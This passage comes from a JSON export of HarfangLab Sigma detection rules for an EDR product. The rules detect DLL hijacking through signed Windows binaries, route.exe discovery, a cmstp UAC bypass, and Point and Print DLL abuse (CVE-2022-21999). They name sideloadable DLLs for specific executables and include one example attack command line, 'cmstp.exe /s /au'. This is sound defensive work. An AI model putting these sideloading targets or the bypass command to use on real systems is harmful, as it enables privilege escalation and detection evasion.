"content": "title: DLL Hijacking via charmap.exe\nid: c456e152-cc03-4950-9835-a23e13694f56\ndescription: |\n Detects potential Windows DLL Hijacking via charmap.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'charmap.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\GetUName.dll'\n - '\\MSFTEDIT.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c456e152-cc03-4950-9835-a23e13694f56",
"rule_name": "DLL Hijacking via charmap.exe",
"rule_description": "Detects potential Windows DLL Hijacking via charmap.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c465c818-727b-41e6-8293-c8a521169d0d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077795Z",
"creation_date": "2026-03-23T11:45:34.077797Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077802Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ctfmon.yml",
"content": "title: DLL Hijacking via ctfmon.exe\nid: c465c818-727b-41e6-8293-c8a521169d0d\ndescription: |\n Detects potential Windows DLL Hijacking via ctfmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ctfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\MsCtfMonitor.DLL'\n - '\\MSUTB.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c465c818-727b-41e6-8293-c8a521169d0d",
"rule_name": "DLL Hijacking via ctfmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ctfmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4b24153-3c9b-4435-97a6-d340a146c01a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296824Z",
"creation_date": "2026-03-23T11:45:35.296832Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296842Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/TheDFIRReport/status/1441052231982329857",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_discovery_route.yml",
"content": "title: Network Discovered via route.exe\nid: c4b24153-3c9b-4435-97a6-d340a146c01a\ndescription: |\n Detects the execution of the route command with the print option.\n Route.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to enumerate the network's routing tables.\n It is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\nreferences:\n - https://twitter.com/TheDFIRReport/status/1441052231982329857\n - https://attack.mitre.org/techniques/T1016/\ndate: 2023/01/10\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'route.exe'\n CommandLine|contains: ' print'\n CurrentDirectory:\n - '?:\\windows\\\\*'\n - '?:\\ProgramData\\\\*'\n - '?:\\PerfLogs\\\\*'\n - '?:\\temp\\\\*'\n - '?:\\users\\\\*'\n - '?:\\\\?Recycle.Bin\\\\*'\n - '?:\\'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n\n exclusion_sdiagnhost:\n ParentImage:\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n\n exclusion_azure:\n ParentImage:\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n\n exclusion_carestream:\n ParentCommandLine: 'powershell.exe -noprofile -executionpolicy bypass -file ?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\Gateway\\Scripts\\autoreport\\autoreport.ps1 autoreport_report.html'\n\n exclusion_netgateway:\n GrandparentImage|endswith: '\\NetGW.Main.Replica.exe'\n\n exclusion_avmvpn:\n GrandparentImage|endswith: '\\nwtsrv.exe'\n ParentCommandLine|endswith: '.tmp'\n\n exclusion_centrastage_ram:\n ParentImage|endswith: '\\AEMAgent.exe'\n GrandparentImage|endswith: '\\CagService.exe'\n\n exclusion_fsecure:\n ParentImage|endswith: 'F-Secure\\Client Security\\diagnostics\\fsdiag.exe'\n GrandparentImage|endswith: 'F-Secure\\Client Security\\ui\\fssettings.exe'\n\n # netstat -nr calls cmd /c route.exe print under the hood...\n exclusion_netstat:\n GrandparentImage:\n - '?:\\windows\\system32\\netstat.exe'\n - '?:\\windows\\syswow64\\netstat.exe'\n\n exclusion_gathernetwork:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c route print >> config\\\\*.txt'\n GrandparentCommandLine: '?:\\windows\\system32\\cscript.exe ?:\\windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_synctrayzor:\n CommandLine: 'route print 0.0.0.0'\n # \\AppData\\Roaming\\SyncTrayzor\\syncthing.exe\n ParentImage|endswith: '\\syncthing.exe'\n GrandparentImage|endswith: '\\syncthing.exe'\n\n\n exclusion_puppet:\n Ancestors|contains: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n exclusion_hp:\n ParentImage|endswith: '\\TouchpointAnalyticsClientService.exe'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'HP Inc'\n\n exclusion_interactive:\n ProcessGrandparentImage: '?:\\Windows\\explorer.exe'\n ProcessParentImage:\n - '?:\\Windows\\system32\\cmd.exe'\n - '?:\\Windows\\syswow64\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_medsys:\n ParentImage: '?:\\pilote\\NoyauEVM\\NoyauEVM.exe'\n\n exclusion_xtool_studio:\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\xTool Studio\\xTool Studio.exe'\n\n exclusion_wakeonlan:\n ParentImage|endswith: '\\WakeOnLanBatch.exe'\n ProcessParentCompany: 'Dipisoft (www.dipisoft.com)'\n\n exclusion_pulse_secure:\n ParentImage: '?:\\Users\\\\*\\AppData\\Roaming\\Pulse Secure\\Host Checker\\dsHostChecker.exe'\n\n exclusion_f5:\n GrandparentImage: '?:\\Windows\\Downloaded Program Files\\f5unistall.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4b24153-3c9b-4435-97a6-d340a146c01a",
"rule_name": "Network Discovered via route.exe",
"rule_description": "Detects the execution of the route command with the print option.\nRoute.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to enumerate the network's routing tables.\nIt is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\n",
"rule_creation_date": "2023-01-10",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4bbcefd-fa8e-42ab-b515-284a8782a738",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082426Z",
"creation_date": "2026-03-23T11:45:34.082428Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082432Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mcoemcpy.yml",
"content": "title: DLL Hijacking via mcoemcpy.exe\nid: c4bbcefd-fa8e-42ab-b515-284a8782a738\ndescription: |\n Detects potential Windows DLL Hijacking via mcoemcpy.exe related to McAfee Oem Module.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mcoemcpy.exe'\n ImageLoaded|endswith: '\\McUtil.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4bbcefd-fa8e-42ab-b515-284a8782a738",
"rule_name": "DLL Hijacking via mcoemcpy.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mcoemcpy.exe related to McAfee Oem Module.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c4f7fe2f-e253-4959-b087-ef115db90e04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099129Z",
"creation_date": "2026-03-23T11:45:34.099131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099135Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscadminui.yml",
"content": "title: DLL Hijacking via wscadminui.exe\nid: c4f7fe2f-e253-4959-b087-ef115db90e04\ndescription: |\n Detects potential Windows DLL Hijacking via wscadminui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscadminui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\wscapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c4f7fe2f-e253-4959-b087-ef115db90e04",
"rule_name": "DLL Hijacking via wscadminui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wscadminui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c554e3b6-a069-4a89-89ba-f0648c009a3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093133Z",
"creation_date": "2026-03-23T11:45:34.093135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093140Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_cmstp.yml",
"content": "title: UAC Bypass Executed via cmstp\nid: c554e3b6-a069-4a89-89ba-f0648c009a3f\ndescription: |\n Detects the execution of the cmstp.exe UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the parent process and user session responsible for UAC bypass to look for malicious content or actions.\nreferences:\n - https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/25\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\cmstp.exe'\n - OriginalFileName: 'CMSTP.EXE'\n selection_2:\n # example: \"cmstp.exe /s /au malicious_profile.inf\"\n # NOTE: spaces will always be present for this matching, this also allow to not have special exclude lists for \"/su\".\n CommandLine|contains:\n # /s: \"Silent mode\"\n - '/s '\n # /au: \"All User Install\"\n - '/au '\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c554e3b6-a069-4a89-89ba-f0648c009a3f",
"rule_name": "UAC Bypass Executed via cmstp",
"rule_description": "Detects the execution of the cmstp.exe UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the parent process and user session responsible for UAC bypass to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c55e3b3a-1eb9-4864-9f07-e1ee1185048f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085168Z",
"creation_date": "2026-03-23T11:45:34.085170Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085175Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999",
"https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/print/downloading-queue-specific-files"
],
"name": "t1574_spoolsv_new_p2p_registered.yml",
"content": "title: Spoolsv Point and Print DLL Added\nid: c55e3b3a-1eb9-4864-9f07-e1ee1185048f\ndescription: |\n Detects the installation of a new Point and Print DLL.\n Attackers can install a new Point and Print DLL as part of CVE-2022-21999 to gain local code execution in spoolsv.\n It is recommended to analyze the DLL pointed to by the registry value to look for malicious content and to investigate any subsequent suspicious behavior by the Spooler service.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999\n - https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/downloading-queue-specific-files\ndate: 2022/02/16\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2022-21999\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2022-21999\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\\\*\\CopyFiles\\Module'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: low\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c55e3b3a-1eb9-4864-9f07-e1ee1185048f",
"rule_name": "Spoolsv Point and Print DLL Added",
"rule_description": "Detects the installation of a new Point and Print DLL.\nAttackers can install a new Point and Print DLL as part of CVE-2022-21999 to gain local code execution in spoolsv.\nIt is recommended to analyze the DLL pointed to by the registry value to look for malicious content and to investigate any subsequent suspicious behavior by the Spooler service.\n",
"rule_creation_date": "2022-02-16",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c566c912-0ee9-4945-a27e-417c0403b2ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097639Z",
"creation_date": "2026-03-23T11:45:34.097641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097645Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md",
